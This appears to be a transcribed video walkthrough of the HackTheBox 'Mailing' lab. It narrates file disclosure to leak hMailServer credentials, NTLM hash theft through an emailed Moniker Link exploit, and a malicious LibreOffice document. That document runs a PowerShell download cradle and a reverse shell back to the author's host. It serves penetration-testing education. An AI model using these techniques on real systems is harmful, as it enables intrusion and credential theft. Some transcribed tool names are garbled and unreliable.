What's going on YouTube? This is Ipsec. I'm doing mailing from HackTheBox, which is focused around exploiting Office applications. That being said, it does start off with a PHP web app that is vulnerable to a file disclosure. You use this to leak the credentials of an email server that's running on the back end that you can use to connect to SMTP and send emails to employees. On the website, you also discover they're using Windows Mail that was vulnerable to a vulnerability in February of 2024, the Moniker Link vulnerability that affected Mail, Outlook, I want to say even affected like Microsoft Word and a lot of Office products. You can use that vulnerability to steal an NTLM hash that will let you get onto the machine with WinRM. Once on the machine, you discover that OpenOffice is installed, or LibreOffice, and it's running a version that is vulnerable to a RCE. And there's also a directory called C:\\important documents that if you upload a document to, the administrator will open it with OpenOffice. So you just create a malicious document and you can get root that way. So with that being said, let's jump in. As always, we're going to start off with an nmap. So -sc for default scripts, -v enumerate versions, -vv for double verbose. This gives us the TTL and things like that. OA output all formats, put in the nmap directory and call it mailing. And then the IP address of 10.10.11.14. This can take some time to run, so I've already ran it. Looking at the results, we have 10 ports open. The first one being SMTP on port 25, and its banner tells us it's an hMailServer. This is just a open source lightweight email server. If it's like an actual enterprise, chances are they're going to be running on Exchange, but in these small VMs, hMailServer runs much better than Exchange. So that's just what that is. It is SMTP, so this is going to be mail. It is leaking the host name of the box, which is mailing.htb. So I'm going to go ahead and add that into my host file. So sudo v etc host, and then let's add 10.10.11.14 mailing.htb and take a look at what else we have here. We have HTTP on port 80, and it's running on Microsoft IIS version 10.0, and the domain is redirecting us to mailing.htb. So we already added this to the host file, so we don't really have to take note of it. We have POP3, some SMB stuff with 135, 139, and 445. IMAP is running on hMailServer. We do have a SSL certificate, and we see the common name also has the box name. I don't see any alternate names. Sometimes you'll see other host names in here as well, like a subdomain. The email address, this is going to be leaking the username format because we just have roy@mailing.htb. So chances are they use just first name to log into their company. This isn't a guaranteed thing because a company could set up like an alias. So he could have his login be like first initial, last name, last name. But this email also gets to him. But most of the time, what you see in an email is also going to be indicative of what the user is. It is saying the company is over in Madrid as well. So let's take a look at what else there is. Certificate again. And let's see, it looks like every other port is just going to be pretty much the SSL port. So we don't have that much to go on. We can start off with like a netexec because this recon doesn't take that long. So I just like doing netexec. We can go 10.10.11.14 and see the host name of the box mailing. It's not part of a domain, so we know that. We could try like shares to see if like anonymous authentication is enabled. And whenever doing this, you normally want to specify a user that doesn't exist as well. I forget exactly what this is testing. Maybe it's guest or something like that. But make sure you get a login failure. We can do it the blank one, see if this gives a different error. But I normally just try these things to see if I ever get a authentication. If I get a successful authentication, then I can move to something like RID, brute forcing to get valid usernames, things like that. But we're kind of at a dead end on SMB, so I'm going to go take a look at the web server. So let's turn Burp Suite off, and then I'm just going to go to HTTP mailing. Whoops, I think I typed that. .htb. And we get the ultimate mail server. So this is just talking about them using hMailServer. We have a list of employees. We have Roy, which is the IT team, Maya, which is support team, and Gregory Smith, the founder and CEO. So what I'm going to do is I'm going to start adding valid users to this. So we have Roy, Maya, and Gregory. I'm also going to add Greg there because maybe he's just formal on the website, right? So I always like building a username list as I go. And then we can click on download instructions to see what this is. And it just opens up a PDF on connecting to mailing.htb. So we got the host name there again. and it talks about the clients that use Windows Mail and Thunderbird. We have connectivity set up, so I like just looking through these to see if there's anything interesting, right? Maybe they're putting some type of password in the document that we can go and try. It doesn't look like that's the case. There is something at the very bottom of this, though. What was that highlighted? Make sure to check all boxes, so that's not too important. If we go to the bottom, they're also showing another email address, maya@mailing.htb. So this is just confirming they're using the first name format in case we missed it on their SSL certificate. So the other thing I like checking for on that, and I kind of missed it. Hold on, let's just open this up again. Whenever I get a screenshot, I do like looking at the systray, because if I'm doing a assessment against a company, sometimes you'll see like a defensive security product here. So you may know, oh, they're using McAfee or some type of antivirus. They can leak that. The clients are set in Spanish, it looks like, with that ESP there. So this is just leaking a little bit of information against the target. You never know when that's going to be handy, right? So let's go and look at the metadata. So if we do exif tool on that PDF, instructions.pdf, we can see just the creator is Roy Alonso. So I was hoping we get like potentially another username here. They are using the Microsoft Word product 365. I want to say this may be unique to it being in Spanish. At least I really hope it's Spanish, because I'm not used to seeing para. I don't know what that is. But this is just indicative of the language set that's on the client, right? So if you're doing phishing, you may not want to say things in English, right? These are just all these small context clues you kind of get picked up on. So let's go and take a look at that download link, right? So if we look at the link, it's actually leaking that it's PHP. It didn't look like that when we just clicked it and downloaded it, because it kind of just opened the PDF. But if we turn intercept on, we forgot to do that. Let's go and turn intercept on. And then click download again and see this in Burp Suite. It's actually going to go to instructions.pdf. And this is going to be vulnerable to file disclosure, but I want to talk about something about metadata real quick on a server, right? So let's just say this did some type of URL routing. So instead of just being blatant and hitting the PHP script and giving us an argument like this, sometimes you'll see like an API endpoint go with like file/instructions.pdf. And you never know if this is just a static file or it's just being rewritten and grabbed from the server as an argument. You can find that out by looking at the metadata after you download a file. And to do this, I normally use wget because it preserves a lot of timestamps that Firefox and curl do not. I've talked about this before in old videos. I'm sure if you go to ipsec.rocks, you can find me just talking about it, but we'll just show right here real quick. So if I do a wget against this PDF and then run a stat, and wget saved it as that weird file name, we see the access, modify, change, and birth is all the same. This is exactly when I downloaded the file. But let's take a image file off of this. So let's just go and grab this, and I'm going to run a stat against this. And what we see is the modify date. This is going to be the date the image touched the server, right? And we see that is 0309. This kind of gives us an idea of when the box was created, but the reason why this happens is because the PHP code is just doing a either like include or file get contents on this file and then throwing us the bytes. Versus if it's coming from a static file off the server, Apache's actually going to send all the metadata with that file as well. So when you do a wget against a file and see the modified date is kind of like this, you have a relatively confident understanding that that is indeed a static file on the server. And if the modified date is the time you downloaded it, it may likely be coming from a script grabbing it from somewhere else. So those are just small recon things you can do. Hopefully I didn't just confuse the living crap out of you, but let's go move on and see how this endpoint works. So we go download.php and we specify a file. And then it looks like Burp is hanging as it tries to process this PDF. I'm hoping my computer didn't freeze. There we go. So the first thing I like trying to do is, let's just go with download.php. Let's try including itself. We get file not found. Let's go up one directory and we get a PHP header and the script. So what this is telling us is we do have a file disclosure vulnerability. I don't call it a LFI because we're not executing code. If this was an include statement on the file, then we wouldn't see this PHP tag because it would be executing the code in here, and it would probably either the request wouldn't return or it would do nothing or it'd error because we're kind of going in this recursive loop of download.php, grabbing download.php that grabs download.php, right? So we have file disclosure. The other thing we can do to confirm this is try to go outside of the directory. And on a Windows box, I normally go for Windows System32 license.rtf because this is just a file that always exists on Windows. And we can see we can get the Windows license off of this. I'm sure if we opened it, it would actually tell us the version of Windows. I don't know off the top of my head, and that format's a pain to read. So let's just move on. We know it's Windows. If we didn't know that, we could go like etc passwd, and that confirms it's not going to be Linux. So what type of files do we want to grab? Well, I don't know if there's any type of database on this, right? So I'm going to disable burp real quick, and let's just try like login.php. We don't have anything. Index.php, it loads a page. So let's go ahead and grab index.php, because my key thing is there any type of database being used? If there is, then I'm going to go try to grab the config. And that just looks like static. We could try like config.php. That's a common one, DB. We don't have anything. I probably should be running GoBuster to do a dirbust on this to see if there's anything else. But let's just kind of move on. So they are using hMailServer. So my first step is hMailServer configuration file to see where this is stored, to see if I can download the hmail configuration file. Going to the documentation, they have the ini file, and let's see. Examples are stored in that. I don't see it says where. Database. Let's see. Google.com. Where is stored? C: documents. So it looks like maybe the data directory. Let's just try all. Oh, hMailServer ini is located in bin. So let's go to program files, hMailServer bin, and see if we can grab this. So we do program files, this. We have to encode the space and program files. So I'm just going to do, let's do %20 there. And then what is it? hMailServer.bin. File not found. This could be x86, right? So let's try program files x86. File not found. Is there not a space here? Let's see. Am I getting the ini file right? Let's see. Bin. Oh, I have .bin. We should do .ini. Let's just paste because typing leads to mistakes. I'm going to do a space again here, and we can get the ini file. One thing that's specific about Windows, I normally use short file paths because I hate the x86 thing and program files. The short file path is progra squiggly 1, and that's going to be the regular program files. Squiggly 2 is x86. This is normally how I just do it on Windows, just because I find that easier. And looking at this, we can get the administrator password and a MS SQL password here. So let's go ahead and try to crack these. So I'm just going to go to CrackStation because that looked like a MD5 sum. We could use like Hashcat to crack it as well, but if it's just MD5s, normally my first thing is just going to CrackStation, and we get one crack. So the administrator password is home networking administrator. So let's go and see if we can log into this box now. So we'll do NXC, was it SMB 10.10.11.14-U administrator-P home networking administrator, and see if this lets us on. we get a login failure. So my next step is to use all the usernames we collected. So I'm just going to give it the users.txt thing. And we're going to try Roy, Maya, Gregory, and Greg. And none of those worked. So what do these credentials go to? Well, there is an SMTP server running, so let's try testing authentication against that. The easiest way I like doing is just using a tool called Swax. This also can easily send emails from the command line, but you can easily just test it for authentication. So we're going to do swax-server mailing.htb. Auth is we want the login method, then the auth user. We do administrator at mailing.htb. It needs to be the fully qualified name. Auth password is going to be, what do we have? It was home networking administrator. Let's just copy and paste so we don't make a typo. And then after this, we want to tell it to quit after authenticating. And we can see we have successfully authenticated. If we had the wrong password, let's just take off a random character. We see no authentication type succeeded. So we can log in. And at this point, I would probably send an email to each user with a link to see if they'd click it, but they don't, and I don't want to waste time in the video doing that. So you got to go back to the drawing board. We can log into an email server and email people. No one's clicking a link. So the next thing is to think back to that PDF that we downloaded. Is it, what's the hotkey for downloads? I thought I hit it, but maybe not. Oh, Control-Shift-Y. I guess I was hitting Chrome's hotkey or something. But they use Windows Mail and Thunderbird. And also keep in mind, we saw in the time the box was being created with the stat against a image off the server. So we know this box is somewhat relatively recent. That just means probably won't try like a 2022 CVE, right? So let's go and actually I clicked the wrong thing. This is when the box was created. I'm going to go ahead and Google. Let's do Windows Mail exploit 2024, right? And we see this. This is in June. June is much later than this. We could go dig into those CVEs, but I'd probably look for a CVE from before the box started getting developed on, right? If we add GitHub, we get a POC from February. So let's look at this one real quick. Let's see. I'm trying to think of a good place to start because I really hate just running exploits because you don't really learn much about the exploit. I guess we can talk about the checkpoint article. This is going to be really good. Also, if we look at this, they have two demos, a zero-click NTLM leak and a remote code execution. This checkpoint article that they link is really good, explains everything about it. Essentially, if you try to put a link in a Outlook file, and I think they say it here, this is like all Office applications. As you see in this box, we're doing against the Mail application, not Outlook. It's just how Microsoft Office handles things. I almost said Word, but everything kind of uses the same like preview pane for code, right? If you try to click a link that Outlook doesn't really expect, it normally pops this up that just says something went wrong, right? But the actual bug is if you put a exclamation point and then something there, that kind of disables that check, and then it goes into like Moniker links and other things that you don't really have to understand. I mean, I don't really understand them that much. I was happy just knowing like the POC because like getting a brief understanding of how it goes. Like, is this like fancy HTML? Like, how is this redirection thing working? And then if we click on the POC, we can see it literally just does file, the link URL, exclamation point POC. I don't think like this image base64 is needed. Actually, let's remove this line to see if we actually need it. If we can just send the HTML. If we can just send the HTML, we could probably also just use Swax to send this if Swax can do HTML. Swax-h, maybe help. See, does this have HTML? Let's see, HTML body. I'm not exactly sure how to use Swax to send HTML, but let's just download this POC and then remove that base64 tag. Because I'm just curious. So we'll do a git clone. And then we can go into this CVE and go in here. Maybe we need that. That's a big image they put in. Let's just delete it and see what happens. So we send that. And then we need to stand up before we send the email. We want to stand up responder because it's going to make a connection back to us over 445. And we want to do capture the NTLM credential. So let's do sudo responder. I forget the flags. It's been a while since I used responder. -I ton 0 capital I. Let's see, is SMB poisoning on? That's the main thing we want. Server, HTTPS, WPAD. SMB is on, so that should be good. Let's see, so we can do Python 3, this CVE, and then what are the arguments? I'm sure if we do -help, it would tell us, but we need server, port, username, password. So let's do --server, mailing.htb, port 587, username administrator at mailing.htb, password. Should go back up to SWOX. It's the home networking administrator, home net, and then copy this. Net. Okay. What else do we need? Sender, administrator at mailing HTTP, recipient. Did I spell that right? I did. And we're actually going to use, let's do Maya, because this is the one that was in the PDF. So there we go. URL, we're going to pass in 10.10.14.8, which is my IP address. And then test meeting. You just need to get the full UNC path. They have this in quotes. Probably should do that because backslashes are escape characters, so it probably wouldn't send as we expect it. -- subject test. So let's see what happens here. We may have to change the port. It says email has been sent successfully. So let's just wait about, I guess, a minute, and then we'll see if we get a email back. Or not email, a connection back. So I'm going to pause the video and we'll come back after, let's do 2 minutes. So we'll come back when the sleep is done. And the sleep server, we also have a NTLM v2 hash. So I'm going to copy this and then we're going to attempt to crack it. So let's go and SSH to the Kraken, which is just a box on my local network. You can use your host operating system to run Hashcat. I just wouldn't run Hashcat in a VM. So let's do hashes. I'm going to call this mailing.ntlm v2. And then we're going to paste this in. And then let's just run Hashcat against it. So let's do Hashcat, and then that, and then opt word list rocku.txt. And the reason why I don't use like CrackStation and things like that to try to crack the NTLM v2 hash is because these are salted. So since it's salted, it can't just work with a like pre-computed list of just all the MD5s. So you really just have to crack it, right? So looks like it may have already finished. I'm going to do hashcat and then --show. And we see, let's see, the password is Maya NGS 4RI. So let's try this credential with NXC. So let's go back to NXC, SMB, and then I'm going to specify Maya, or is it Maya? Maybe I haven't been saying the name wrong the whole time, but we can try logging in. And meanwhile, we can close off the Packet server and close that. And we get a successful authentication. But since it doesn't say pwned, we can't write to the C drive, which means we can't get code execution with SMB. So the next thing I normally try is the --shares flag. This is going to list all the shares on the box. And maybe there's like an interesting file for us to look at, right? So looking at this, we do have a share called important documents. So let's do let's do SMB client actually. And then we can say the Maya user and then 10, 10, 11, 14, important, and then a backslash so we can do the space, documents, and then we want to put the password. Let's just copy and paste this. So I can copy, paste, and then do a dir, and it shows there are no files here. So it doesn't look like we can really do much with SMB. There are other options for netexec, right? So let's try one of the other ones, which is like WinRM. And if we do WinRM, it does say pwned. So that does indicate that we should be able to use a tool like evil WinRM in order to access the box. So let's do evil WinRM -I 10, 10, 11, 14. Username is Maya. Password is that. And let's see if we can log in. And it looks like we can. So the next part is let's go look at that importance directory, right? The important documents directory, because this is where we were before on the SMB and we didn't see any files. So let's check from PowerShell. So if we go into this folder, I'm going to do GCI force because this is going to show like hidden items. If there are any hidden documents, we don't see anything. We could run WinPs and stuff to look at like what types of things are on the box. Another thing is we could try like writing in the web directory root, because maybe if we can actually get a shell from the web server, we may have a dangerous permission. So that's normally something I test. We got to figure out where that exactly is. If we go to PHP, this is probably going to be the PHP installation. Let's see. It's probably going to be under inetpub and then www.root. And I don't see where index.php is. Let's see. Probably not inetpub then. Where else could it be? www.root offc. Okay. So if we go here, we have permission denied. So it doesn't look like we can do anything. If we echo to a file, doesn't let us. Let's see. There was a directory this downloaded from, right? So we could try writing into the directory. Let's see. Download PHP. Let's just download the script again. And let's do instructions. So if we go cd instructions, we can't get in because it doesn't exist. So I guess we just don't have any permissions in this directory. So there's not much else we can do. And looking at this real quick, file path. Okay. I was thinking we could maybe like try to steal the hash of the web server. I don't think I talked about it when we're going over this, but one common thing to do with file disclosures on Windows is putting the UNC path here. So we do like 10, 10, 14, 8 like this and try to have the web server reach back to us, but we can't because if we look at the file path, it's prepending this, right? So what we put here would become c:/www root or whatever this is, and that breaks our UNC path. So that's why we can't use the file disclosure to leak the NTLM credentials of the web server. So that's all not getting us anywhere. So the next thing I'd look at is like what's installed on the server, right? So if we do program1, this is going to get us in program files, and I see LibreOffice is installed. So if we do LibreOffice, and then one of these files will have the actual version. Is it in program? Let's see. That's all DLLs. I could have sworn there was a like configuration file. I probably just missed it. I'm going to do a dir on program. See, I see non-DLLs there. If we look, there is a ini file, so versions.ini. And if we look at this, it's going to, we are not in program. Like that. There we go. It is going to tell us the product version, so 7401. So if we Google this, so if we go, let's see, open Office 7401 exploit, and search Google, there is a CVE here and then some information about it. I think that's the same thing. And this is going to create a malicious OpenOffice document. So let's go ahead and clone this repository. So I'm going to do a git clone. Actually, let's go up a directory, git clone this. I'm going to make a web directory as well. And then let's go in the CVE. And how do they do this? So they're just doing a CMD for downloading a PHP file. Okay, so we can execute this. So Python 3 CVE with --cmd and run a command. And then the output is --output exploit.odt. So whatever command we put here will get run. So I'm going to do cmd/c, then PowerShell encoded. And what we want to do is create a cradle real quick to execute things off of file server. So this is going to be the IX new object net.web client download string and then HTTP 10.10.14.8. I always put my web server in port 8000 and we'll do shell.ps1. You don't need to do the web cradle, but whenever doing reverse shells, I always like doing it because it tells me if antivirus is flagging it. Because antivirus isn't going to flag this, right? It'll flag my reverse shell. So if I see it hit my web server and I don't get a reverse shell, I'm going to guess antivirus killed it. So I always just like adding this one step. Some people think it overcomplicates it, but it lets me enumerate AV. So I know better, I guess, right? So let's do not IX. What is it? iConvert -t UTF 16 little endian, because Windows, that's the format it likes it, right? If we do XXD, you can see there's a null byte after every character because that's the 16 little endian format. If we got rid of the iConvert, it's just as you expect, right? So that's all we do. This puts it in a friendly format for Windows, so we can run this. And then the next thing to do is we have to get a reverse shell, right? So we can do PowerShell like that. Okay. And then let's see. We can go in dub. And I'm going to copy user share nashang shells PowerShell. Is it PowerShell? Invoke PowerShell TCP oneline.ps1 to shell.ps1. And then let's put a shell here. So we can do TCP client 10.10.14.8 9001. Save that. Okay. So let's go ahead and create the exploit. I'm going to move exploit ODT into the www directory we created. And then we're going to stand up our web server. And then we can stand up our netcat listener. And then let's go into important documents. And let's download the document here. So curl 10.10.14.8 port 8000 exploit.odt and let's put HTTP ahead. Okay, so we have downloaded the document. And then if someone opens this document with OpenOffice, it will then reach back to us, download shell.ps1, and then hopefully execute that in PowerShell. So that is what we are waiting on right now. And whenever I wait for a task, I always like just sleeping for 2 minutes. So what we're going to do is just pause the video and we'll come back when the 2 minutes is up. Okay, it hasn't even been 2 minutes yet, and we see the get on shell.ps1 and a connection here. If I hit enter and do who am I, we see mailing local admin. So if we go into users and then, let's see, local admin, desktop, we can get root.txt. And that's pretty much the box. So hope you guys enjoyed it. Take care, and I will see you all next time.